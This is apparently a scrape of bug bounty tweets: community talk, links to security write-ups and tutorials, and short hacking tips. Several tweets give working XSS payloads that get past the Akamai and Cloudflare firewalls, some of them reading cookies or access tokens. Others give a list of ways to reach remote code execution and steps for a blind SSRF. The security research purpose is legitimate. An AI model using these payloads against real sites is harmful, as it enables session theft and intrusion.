Can Bug Bounty Cause Serious Mental Stress, Extreme Frustration Or Learned Helplessness? #bugbounty #hacking #bugbountytips Curious To Know!
A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload: javascript:new%20Function`al\ert\`1\``; You can also obfuscate it using HTML entities #BugBounty
I miss the good old hacking days when it was not just about finding bugs, around 2011, when hacking wasn't any race. These days I see beginners say, "I want to learn bug hunting", no one says "I want to learn hacking". Days when hacking was not about earning but about learning.
Hunting for Vulnerabilities in Android Apps with Burp and APK Tools. labs.p64cyber.com/hunting-for-vu…
[Deserialization Attack Resources] Introductory Video: youtube.com/watch?v=EzOquQ… Paper: exploit-db.com/docs/english/4… Write-ups: hackerone.com/reports/134321 hackerone.com/reports/350418 artsploit.blogspot.com/2016/01/paypal… Cheatsheet: github.com/swisskyrepo/Pa…
FTP Penetration Testing on Ubuntu (Port 21) hackingarticles.in/ftp-penetratio… SSH Penetration Testing (Port 22) hackingarticles.in/ssh-penetratio… Penetration Testing on Telnet (Port 23) hackingarticles.in/penetration-te… NetBIOS and SMB Penetration Testing on Windows hackingarticles.in/netbios-and-sm…
I'm proud to share my first write-up, hope you enjoy it Think Outside the Scope: Advanced CORS Exploitation Techniques link.medium.com/UTKkk4wvGW
“Web Services & API Pentesting-Part 1” by Asfiya Shaikh link.medium.com/a/key_live_ofx…
“BLIND SSRF in *.stripe.com due to Sentry Misconfiguration” by Oktavandi link.medium.com/DFF748gyyW
Sentry Blind SSRF (hackerone.com/reports/374737 /medium.com/@0ktavandi/bli…) 1. cat aquatone/*/urls.txt | grep sentry 2. Burpsuite 3. Send it to Repeater 4. Change the value of filename: to a postb.in url (or similar) 5. Wait for a connection 6. 👻
Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it: <style>@KeyframeS a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
It's my honor to present at #BHUSA again! @mehqq_ and I will show our research and disclose pre-auth RCEs on at least 3 leading SSL VPN vendors! blackhat.com/us-19/briefing… @BlackHatEvents
XXE triggered by a UDP response packet; that's slick. The write-up is great as well with vulnerable Docker and really nice PoC. talosintelligence.com/vulnerability_…
#bugbounty tip: to demonstrate XSS impact, don't use alert('alert'). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem('access_token')) #securetheinternet
Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, etc.) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!
#tutorial Universal Android #SSLPinning In 10 Minutes With Frida (@fridadotre) I didn’t find a pretty clear tutorial for beginners in mobile security like me, so that’s why I decided to create this 10 min tutorial. omespino.com/tutorial-unive… #BugBounty #infosec #AndroidSecurity
Cloudflare Bypass: <a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>
Happy October, SRT! For our #SRToftheMonth, we are excited to introduce not just one, but three. Congrats @nahmedfaisal, @tareksiddiki & @meshahriyar!! These 3 made some $$ hacking for Synack during their vacation in Bangladesh last year. #placesyougowithSRT
If you are testing graphql try entering some random queries e.g: `mutation addAdmin` and graphql might ask if you meant createAdmin
Just released a new exploit for CVE-2018-15473 OpenSSH Username Enumeration! You can find it here: github.com/Rhynorater/CVE…
